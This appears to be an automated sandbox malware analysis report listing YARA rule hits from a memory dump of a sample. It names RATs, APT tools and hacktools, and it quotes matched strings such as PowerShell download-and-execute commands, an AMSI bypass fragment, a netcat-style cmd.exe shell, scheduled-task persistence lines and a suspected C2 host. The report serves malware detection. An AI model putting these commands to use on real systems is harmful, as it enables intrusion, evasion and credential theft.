0x1861a:$s7: hackqz.f3322.org:8880
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	WScript_Shell_PowerShell_Combo	Detects malware from Middle Eastern campaign reported by Talos	Florian Roth	0x2baf:$s1: .CreateObject("WScript.Shell") 0x1a4cf:$s1: .CreateObject("WScript.Shell") 0x1a673:$s1: .CreateObject("WScript.Shell") 0x3d98:$p1: powershell.exe 0x3dbf:$p1: powershell.exe 0x3f66:$p1: powershell.exe 0x3fa3:$p1: powershell.exe 0x5747:$p1: powershell.exe 0xd118:$p1: powershell.exe 0xd273:$p1: powershell.exe 0xd2b1:$p1: powershell.exe 0x10376:$p1: powershell.exe 0x13456:$p1: powershell.exe 0x38dd2:$p1: powershell.exe 0x3b7dc:$p1: powershell.exe 0x3bc38:$p1: powershell.exe 0x3c620:$p1: powershell.exe 0x3cb19:$p1: powershell.exe 0x3df32:$p1: powershell.exe 0x950:$p3: [System.Convert]::FromBase64String( 0x3d189:$p3: [System.Convert]::FromBase64String(
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	HTA_with_WScript_Shell	Detects WScript Shell in HTA	Florian Roth	0x15f6a:$s1: <hta:application windowstate="minimize"/> 0x160fb:$s1: <hta:application windowstate="minimize"/> 0x15f98:$s2: <script>var b=new ActiveXObject("WScript.Shell");
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	HTA_Embedded	Detects an embedded HTA file	Florian Roth	0x15f6a:$s1: <hta:application windowstate="minimize"/> 0x160fb:$s1: <hta:application windowstate="minimize"/>
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	StoneDrill	Detects malware from StoneDrill threat report	Florian Roth	0x3a987:$s1: Hello dear 0x3a996:$s2: WRZRZRAR 0x3a9a5:$opa1: 66 89 45 D8 6A 64 FF 0x3a9b3:$opa2: 8D 73 01 90 0F BF 51 FE
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	StoneDrill_VBS_1	Detects malware from StoneDrill threat report	Florian Roth	0x3ab38:$x1: wmic /NameSpace:\\root\default Class StdRegProv Call SetStringValue hDefKey = "&H80000001" sSubKeyName = "Software\Micros 0x3abb6:$x2: ping 1.0.0.0 -n 1 -w 20000 > nul 0x3abdb:$s1: WshShell.CopyFile "%COMMON_APPDATA%\Chrome\ 0x3ac0b:$s2: WshShell.DeleteFile "%temp%\ 0x3ac2c:$s3: WScript.Sleep(10 * 1000) 0x3ac49:$s4: Set WshShell = CreateObject("Scripting.FileSystemObject") While WshShell.FileExists(" 0x3aca3:$s5: , "%COMMON_APPDATA%\Chrome\
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	ZxShell_Jul17	Detects a ZxShell - CN threat group	Florian Roth	0x1160e:$x1: zxplug -add 0x1161e:$x2: getxxx c:\xyz.dll 0x11634:$x3: downfile -d c:\windows\update.exe 0x1165a:$x4: -fromurl http://x.x.x/x.dll 0x1167a:$x5: ping 127.0.0.1 -n 7&cmd.exe /c net start %s 0x116aa:$x6: ZXNC -e cmd.exe x.x.x.x 0x116c6:$x7: (bind a cmdshell) 0x116dc:$x8: ZXFtpServer 21 20 zx 0x116f5:$x9: ZXHttpServer 0x11707:$x10: c:\error.htm,.exe\|c:\a.exe,.zip\|c:\b.zip" 0x11736:$x11: c:\windows\clipboardlog.txt 0x11757:$x12: AntiSniff -a wireshark.exe 0x11777:$x13: c:\windows\keylog.txt
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	EternalRocks_taskhost	Detects EternalRocks Malware - file taskhost.exe	Florian Roth	0x19b25:$s1: sTargetIP 0x19b33:$s2: SERVER_2008R2_SP0 0x19b49:$s3: 20D5CCEE9C91A1E61F72F46FA117B93FB006DB51 0x19b76:$s4: 9EBF75119B8FC7733F77B06378F9E735D34664F6
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	BeyondExec_RemoteAccess_Tool	Detects BeyondExec Remote Access Tool - file rexesvr.exe	Florian Roth	0x38f6a:$x1: \BeyondExecV2\Server\Release\Pipes.pdb 0x38f95:$x2: \\.\pipe\beyondexec%d-stdin 0x38fb5:$x3: Failed to create dispatch pipe. Do you have another instance running? 0x39000:$op1: 83 E9 04 72 0C 83 E0 03 03 C8 FF 24 85 80 6F 40 0x39016:$op2: 6A 40 33 C0 59 BF E0 D8 40 00 F3 AB 8D 0C 52 C1
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Disclosed_0day_POCs_injector	Detects POC code from disclosed 0day hacktool set	Florian Roth	0x12926:$x1: \Release\injector.pdb 0x12940:$x2: Cannot write the shellcode in the process memory, error: 0x1297e:$x3: /s shellcode_file PID: shellcode injection. 0x129ae:$x4: /d dll_file PID: dll injection via LoadLibrary(). 0x1297e:$x5: /s shellcode_file PID 0x129e4:$x5: /s shellcode_file PID 0x129fe:$x6: Shellcode copied in memory: OK 0x12a21:$x7: Usage of the injector. 0x12a3d:$x8: KO: cannot obtain the SeDebug privilege.
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	APT_PupyRAT_PY	Detects Pupy RAT	Florian Roth	0xa146:$x1: reflective_inject_dll 0xa1c7:$x1: reflective_inject_dll 0xa1e1:$x1: reflective_inject_dll 0x3b960:$x1: reflective_inject_dll 0x3b97a:$x2: ImportError: pupy builtin module not found ! 0x3b9ab:$x3: please start pupy from either it's exe stub or it's reflective DLLR; 0xa19a:$x4: [INJECT] inject_dll. 0x3b9f4:$x4: [INJECT] inject_dll. 0x3ba0d:$x5: import base64,zlib;exec zlib.decompress(base64.b64decode('eJzzcQz1c/ZwDbJVT87Py0tNLlHnAgA56wXS')) 0x3ba74:$op1: 8B 42 0C 8B 78 14 89 5C 24 18 89 7C 24 14 3B FD
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	OilRig_Strings_Oct17	Detects strings from OilRig malware and malicious scripts	Florian Roth	0x6b9:$x1: %localappdata%\srvHealth.exe 0x6da:$x2: %localappdata%\srvBS.txt 0x6f7:$x3: Agent Injector\PolicyConverter\Inner\obj\Release\Inner.pdb 0x736:$x4: Agent Injector\PolicyConverter\Joiner\obj\Release\Joiner.pdb 0x777:$s3: .LoadDll("Run", arg, "C:\\Windows\\
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Suspicious_Script_Running_from_HTTP	Detects a suspicious	Florian Roth	0x9211:$s1: cmd /C script:http:// 0x922b:$s2: cmd /C script:https:// 0x9246:$s3: cmd.exe /C script:http:// 0x9264:$s4: cmd.exe /C script:https://
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	VBS_dropper_script_Dec17_1	Detects a supicious VBS script that drops an executable	Florian Roth	0x906:$s5: TVqQAAMAAAAEAA 0xf74b:$s5: TVqQAAMAAAAEAA 0x3fd7:$a1: = CreateObject("Wscript.Shell") 0x3d725:$a1: = CreateObject("Wscript.Shell") 0x3df7d:$a1: = CreateObject("Wscript.Shell")
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Industroyer_Malware_1	Detects Industroyer related malware	Florian Roth	0x170d5:$s1: haslo.exe 0x17136:$x1: 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 73 00 5C 00 25 00 6C 00 73 00 00 00 49 00 6D 00 61 ... 0x17182:$x2: haslo.datCrash
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Industroyer_Portscan_3_Output	Detects Industroyer related custom port scaner output file	Florian Roth	0x16f5b:$s1: WSA library load complite. 0x16f7a:$s2: Connection refused
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Industroyer_Malware_4	Detects Industroyer related malware	Florian Roth	0x17812:$s2: defragsvc 0x17820:$a1: 00 2E 00 64 00 61 00 74 00 00 00 43 72 61 73 68 00 00 00
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Industroyer_Malware_5	Detects Industroyer related malware	Florian Roth	0x1796f:$x1: D2MultiCommService.exe 0x1798a:$x2: Crash104.dll 0x1799b:$x3: iec104.log 0x179aa:$x4: IEC-104 client: ip=%s; port=%s; ASDU=%u 0x179d7:$s1: Error while getaddrinfo executing: %d 0x17a01:$s2: return info-Remote command 0x17a20:$s3: Error killing process ... 0x17a3e:$s4: stop_comm_service_name 0x17a59:$s5: 1 Data exchange: Send: %d (%s)
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	redSails_PY	Detects Red Sails Hacktool - Python	Florian Roth	0x3b6d:$x1: Gained command shell on host 0x3b8e:$x2: [!] Received an ERROR in shell() 0x3bb3:$x3: Target IP address with backdoor installed 0x3be1:$x4: Open backdoor port on target machine 0x3c0a:$x5: Backdoor port to open on victim machine
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Rehashed_RAT_2	Detects malware from Rehashed RAT incident	Florian Roth	0x747f:$x1: dalat.dulichovietnam.net 0x749c:$x2: web.Thoitietvietnam.org 0x74b8:$a1: User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64) 0x7502:$a2: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3 0x7587:$s1: GET /%s%s%s%s HTTP/1.1 0x75a2:$s2: http://%s:%d/%s%s%s%s 0x75bc:$s3: {521338B8-3378-58F7-AFB9-E7D35E683BF8}
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Malware_QA_vqgk	VT Research QA uploaded malware - file vqgk.dll	Florian Roth	0xea16:$x3: %d is an x86 process (can't inject x64 content) 0x17f91:$x3: %d is an x86 process (can't inject x64 content) 0xe9e0:$s1: powershell -nop -exec bypass -EncodedCommand "%s" 0x17f5b:$s1: powershell -nop -exec bypass -EncodedCommand "%s" 0x17fc5:$s2: Could not open process token: %d (%u) 0xeac5:$s5: Failed to impersonate logged on user %d (%u) 0xea4a:$s6: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x17f0d:$s6: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x36:$s7: could not write to process memory: %d 0xea98:$s9: Failed to impersonate token from %d (%u)
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Pupy_Backdoor	Detects Pupy backdoor	Florian Roth	0xa08d:$x1: reflectively inject a dll into a process. 0xa0bb:$x2: ld_preload_inject_dll(cmdline, dll_buffer, hook_exit) -> pid 0xa0fc:$x3: LD_PRELOAD=%s HOOK_EXIT=%d CLEANUP=%d exec %s 1>/dev/null 2>/dev/null 0xa146:$x4: reflective_inject_dll 0xa1c7:$x4: reflective_inject_dll 0xa1e1:$x4: reflective_inject_dll 0x3b960:$x4: reflective_inject_dll 0xa0bb:$x5: ld_preload_inject_dll 0xa160:$x5: ld_preload_inject_dll 0xa17a:$x6: get_pupy_config() -> string 0xa19a:$x7: [INJECT] inject_dll. OpenProcess failed. 0xa146:$x8: reflective_inject_dll 0xa1c7:$x8: reflective_inject_dll 0xa1e1:$x8: reflective_inject_dll 0x3b960:$x8: reflective_inject_dll 0xa1e1:$x9: reflective_inject_dll(pid, dll_buffer, isRemoteProcess64bits) 0xa224:$x10: linux_inject_main
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Microcin_Sample_5	Malware sample mentioned in Microcin technical report by Kaspersky	Florian Roth	0x502e:$x1: Sorry, you are not fortuante ^_^, Please try other password dictionary 0x507a:$x2: DomCrack <IP> <UserName> <Password_Dic file path> <option> 0x50b9:$x3: The password is "%s" Time: %d(s) 0x50e6:$x4: The password is " %s " Time: %d(s) 0x5115:$x5: No password found! 0x512c:$x7: Can not found the Password Dictoonary file!
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	clearlog	Detects Fireball malware - file clearlog.dll	Florian Roth	0x1942d:$x1: \ClearLog\Release\logC.pdb 0x19472:$s2: logC.dll 0x1949b:$s5: Logger Name:
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	PS_AMSI_Bypass	Detects PowerShell AMSI Bypass	Florian Roth	0xf21c:$s1: .GetField('amsiContext',[Reflection.BindingFlags]'NonPublic,Static').
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	JS_Suspicious_Obfuscation_Dropbox	Detects PowerShell AMSI Bypass	Florian Roth	0xf3e7:$x1: j"+"a"+"v"+"a"+"s"+"c"+"r"+"i"+"p"+"t" 0xf412:$x2: script:https://www.dropbox.com
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	JS_Suspicious_MSHTA_Bypass	Detects MSHTA Bypass	Florian Roth	0x7e06:$s1: mshtml,RunHTMLApplication 0xf58b:$s1: mshtml,RunHTMLApplication 0xf5a9:$s2: new ActiveXObject("WScript.Shell").Run( 0xf5d5:$s3: /c start mshta j
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	JavaScript_Run_Suspicious	Detects a suspicious Javascript Run command	Florian Roth	0x8e2e:$s1: w = new ActiveXObject( 0x8e49:$s2: w.Run(r);
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	FVEY_ShadowBroker_Auct_Dez16_Strings	String from the ShodowBroker Files Screenshots - Dec 2016	Florian Roth	0x2cf62:$s2: Auditcleaner 0x2cfc9:$s2: Auditcleaner 0x3276e:$s11: elatedmonkey 0x327e2:$s11: elatedmonkey 0x2d578:$s17: ys.ratload.sh 0x2bccd:$elf4: charm_saver 0x2f51d:$elf8: ebbshave 0x2f585:$elf8: ebbshave 0x2f7bb:$elf9: eggbasket 0x2f824:$elf9: eggbasket 0x31a3c:$elf12: envoytomato 0x31aa2:$elf12: envoytomato 0x31827:$elf14: estopmoonlit 0x3188e:$elf14: estopmoonlit 0x33089:$elf17: ghost_sparc 0x33106:$elf17: ghost_sparc 0x30e1e:$elf18: jackpop 0x30e85:$elf18: jackpop 0x2a8c4:$elf19: orleans_stride 0x2ae50:$elf21: seconddate 0x2bccd:$pe2: charm_saver
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Ysoserial_Payload_Spring1	Ysoserial Payloads - file Spring1.bin	Florian Roth	0x3ea43:$x1: ysoserial/Pwner
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Ysoserial_Payload	Ysoserial Payloads	Florian Roth	0x3eb98:$x1: ysoserial/payloads/ 0x3ebb0:$s1: StubTransletPayload 0x3ebc8:$s2: Pwnrpw
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Ysoserial_Payload_3	Ysoserial Payloads - from files JavassistWeld1.bin, JBossInterceptors.bin	Florian Roth	0x3ed4d:$x1: ysoserialq 0x3ed5c:$s1: targetClassInterceptorMetadatat 0x3ed80:$s2: targetInstancet 0x3ed94:$s3: targetClassL 0x3eda5:$s4: POST_ACTIVATEsr 0x3edb9:$s5: PRE_DESTROYsq
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	CACTUSTORCH	Detects CactusTorch Hacktool	Florian Roth	0xc84c:$x1: $payload = shellcode(%options["listener"], "true", "x86"); 0xc88b:$x2: Copy the base64 encoded payload into the code variable below. 0xc8ee:$x4: ms.Write transform.TransformFinalBlock(enc.GetBytes_4(b), 0, length), 0, ((length / 4) * 3) 0xc94e:$x5: ' Author: Vincent Yiu (@vysecurity) 0xc976:$x6: Dim binary : binary = "rundll32.exe" 0xc99f:$a1: code = code & " 0xc9b3:$a2: serialized_obj = serialized_obj & " 0xc983:$s1: binary = "rundll32.exe" 0xc9db:$s1: binary = "rundll32.exe" 0xca4c:$s1: binary = "rundll32.exe" 0xc9f7:$s2: EL.DataType = "bin.hex" 0xca13:$s3: Set stm = CreateObject("System.IO.MemoryStream") 0xca48:$s4: var binary = "rundll32.exe"; 0xca69:$s5: var serialized_obj = "
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x340c6:$s1: DoUploadAndExecute 0x340dd:$s2: DoDownloadAndExecute 0x340f6:$s3: DoShellExecute 0x34109:$s4: set_Processname 0x3411e:$op1: 04 1E FE 02 04 16 FE 01 60 0x3412d:$op2: 00 17 03 1F 20 17 19 15 28 0x3413c:$op3: 00 04 03 69 91 1B 40
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0x3428e:$x1: GetKeyloggerLogsResponse 0x342ab:$x2: get_Keylogger 0x342bd:$x3: HandleGetKeyloggerLogsResponse 0x342e0:$s1: DoShellExecuteResponse 0x342fb:$s2: GetPasswordsResponse 0x34314:$s3: GetStartupItemsResponse 0x34330:$s4: <GetGenReader>b__7 0x34347:$s5: RunHidden
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	OpCloudHopper_Malware_2	Detects malware from Operation Cloud Hopper	Florian Roth	0x3713a:$x1: sERvEr.Dll 0x3715a:$x3: .?AVCKeyLoggerManager@@ 0x37176:$x4: GH0STCZH 0x371df:$s3: \Release\Loader.pdb 0x37266:$op1: 8D 34 17 8D 49 00 8A 14 0E 3A 14 29 75 05 41 3B 0x3727c:$op2: 83 E8 14 78 CF C1 E0 06 8B F8 8B C3 8A 08 84 C9 0x37292:$op3: 3B FB 7D 3F 8A 4D 14 8D 45 14 84 C9 74 1B 8A 14
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	OpCloudHopper_Malware_3	Detects malware from Operation Cloud Hopper	Florian Roth	0x37429:$s6: operator "" 0x37830:$s6: operator "" 0x38000:$s6: operator "" 0x36f5c:$s7: zok]\\\ZZYYY666564444 0x3743a:$s7: zok]\\\ZZYYY666564444 0x38033:$s7: zok]\\\ZZYYY666564444 0x3b347:$s7: zok]\\\ZZYYY666564444 0x37455:$s11: InvokeMainViaCRT 0x37841:$s11: InvokeMainViaCRT 0x3746b:$s12: .?AVAES@@ 0x37857:$s12: .?AVAES@@ 0x3747a:$op1: B6 4C 06 F5 32 CF 88 4C 06 05 0F B6 4C 06 F9 32 0x37490:$op2: 06 FC EB 03 8A 5E F0 85 C0 74 05 8A 0C 06 EB 03 0x374a6:$op3: 7E F8 85 C0 74 06 8A 74 06 08 EB 03 8A 76 FC 85
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	OpCloudHopper_Malware_5	Detects malware from Operation Cloud Hopper	Florian Roth	0x379e7:$x1: CWINDOWSSYSTEMROOT 0x379fe:$x2: YJ_D_KROPOX_M_NUJI_OLY_S_JU_MOOK 0x37a23:$x3: NJK_JK_SED_PNJHGFUUGIOO_PIY 0x37a43:$x4: c_VDGQBUl}YSB_C_VDlqSDYFU 0x37a61:$s7: FALLINLOVE 0x37a71:$op1: 83 EC 60 8D 4C 24 00 E8 6F FF FF FF 8D 4C 24 00
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	OpCloudHopper_WmiDLL_inMemory	Malware related to Operation Cloud Hopper - Page 25	Florian Roth	0x35b31:$s1: wmi.dll 2>&1
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	VBS_WMIExec_Tool_Apr17_1	Tools related to Operation Cloud Hopper	Florian Roth	0x36c21:$x1: strNetUse = "cmd.exe /c net use \\" & host 0x36c50:$x2: localcmd = "cmd.exe /c " & command 0x36c78:$x3: & " > " & TempFile & " 2>&1" '2>&1 err 0x36ca4:$x4: strExec = "cmd.exe /c " & cmd & " >> " & resultfile & " 2>&1" '2>&1 err 0x36cf1:$x5: TempFile = objShell.ExpandEnvironmentStrings("%TEMP%") & "\wmi.dll" 0x36d39:$a1: WMIEXEC ERROR: Command -> 0x36d58:$a2: WMIEXEC : Command result will output to 0x36d84:$a3: WMIEXEC : Target -> 0x36d9c:$a4: WMIEXEC : Login -> OK 0x36db6:$a5: WMIEXEC : Process created. PID:
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	RevengeRAT_Sep17	Detects RevengeRAT malware	Florian Roth	0x790c:$x1: Nuclear Explosion.g.resources 0x795b:$x4: 5B1EE7CAD3DFF220A95D1D6B91435D9E1520AC41 0x7988:$x5: \RevengeRAT\ 0x7999:$x6: Revenge-RAT client has been successfully installed. 0x79d1:$x7: Nuclear Explosion.exe
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Mimipenguin_SH	Detects Mimipenguin Password Extractor - Linux	Florian Roth	0x386de:$s1: $(echo $thishash \| cut -d'$' -f 3) 0x38705:$s2: ps -eo pid,command \| sed -rn '/gnome\-keyring\-daemon/p' \| awk 0x38748:$s3: MimiPenguin Results:
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	POSHSPY_Malware	Detects	Florian Roth	0xfbd6:$x1: function sWP($cN, $pN, $aK, $aI) 0xfbfb:$x2: $aeK = [byte[]] (0x69, 0x87, 0x0b, 0xf2 0xfc27:$x3: (('variant', 'excretions', 'accumulators', 'winslow', 'whistleable', 'len', 0xfc77:$x4: $cPairKey = "BwIAAACkAABSU0EyAAQAAAEAA 0xfca2:$x5: $exeRes = exePldRoutine 0xfcbe:$x6: ZgB1AG4AYwB0AGkAbwBuACAAcAB1AHIAZgBDAHIA
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Invoke_Mimikatz	Detects Invoke-Mimikatz String	Florian Roth	0xf74b:$x2: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm 0xf7c2:$x3: Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineWAddrTemp
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	FIN7_Backdoor_Aug17	Detects Word Dropper from Proofpoint FIN7 Report	Florian Roth	0xb761:$x1: wscript.exe //b /e:jscript C:\Users\ 0xb78a:$x2: wscript.exe /b /e:jscript C:\Users\ 0xb7b2:$x3: schtasks /Create /f /tn "GoogleUpdateTaskMachineSystem" /tr "wscript.exe 0xb7ff:$x4: schtasks /Delete /F /TN ""GoogleUpdateTaskMachineCore 0xb839:$x5: schtasks /Delete /F /TN "GoogleUpdateTaskMachineCore 0xb872:$x6: wscript.exe //b /e:jscript %TMP%\debug.txt 0xb8a1:$s1: /?page=wait 0xb8b1:$a1: autoit3.exe 0xb8c1:$a2: dumpcap.exe 0xb8d1:$a3: tshark.exe 0xb8e0:$a4: prl_cc.exe 0xb8ef:$v1: vmware 0xb8fa:$v2: PCI\\VEN_80EE&DEV_CAFE 0xb915:$v3: VMWVMCIHOSTDEV 0xb928:$c1: apowershell

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report GZe6EcSTpO

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Dropped Files

Memory Dumps